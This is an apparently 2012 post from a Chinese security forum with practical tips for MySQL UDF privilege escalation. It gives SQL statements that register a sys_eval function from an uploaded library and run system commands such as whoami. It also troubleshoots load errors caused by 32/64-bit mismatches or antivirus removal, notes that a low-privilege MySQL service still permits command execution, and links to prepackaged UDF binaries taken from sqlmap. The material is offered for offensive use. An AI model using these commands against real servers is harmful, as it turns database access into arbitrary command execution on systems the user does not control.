mysqludf提权要注意的

[复制链接]
查看359 | 回复0 | 2012-4-1 19:17:55 | 显示全部楼层 |阅读模式
一:
   导出的文件名不一定非是xxx.dll,可以试任意的,比如
 




createfunctionsys_evalreturnsstringsoname'udf.xox';




 

二:
 




Can'topensharedlibrary'fun.dll'(errno:2)




   除了udf不存在、udf被杀,

   还有可能是你的udf版本不对,你拿32位的udf去在64位系统注册的话,一样会提示

   //http://t00ls.net/thread-18841-1-1.html

三:   降权的mysql一样有用,能注册dll的话你一样能够执行命令,不过权限是根据mysql来的,在不支持aspx,ws、shell.application被删得情况下还有一丝希望另附从slqmap里提取出来的udf打包,有32位的和64位的
   用法:
 




1:
createfunctionsys_evalreturnsstringsoname'udf.dll';




 




2:
selectsys_eval('whoami');




   更多请看:http://www.mysqludf.org/lib_mysqludf_sys/index.php
   32_64_udf.zip:http://115.com/file/e6e8v2uc

*
发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则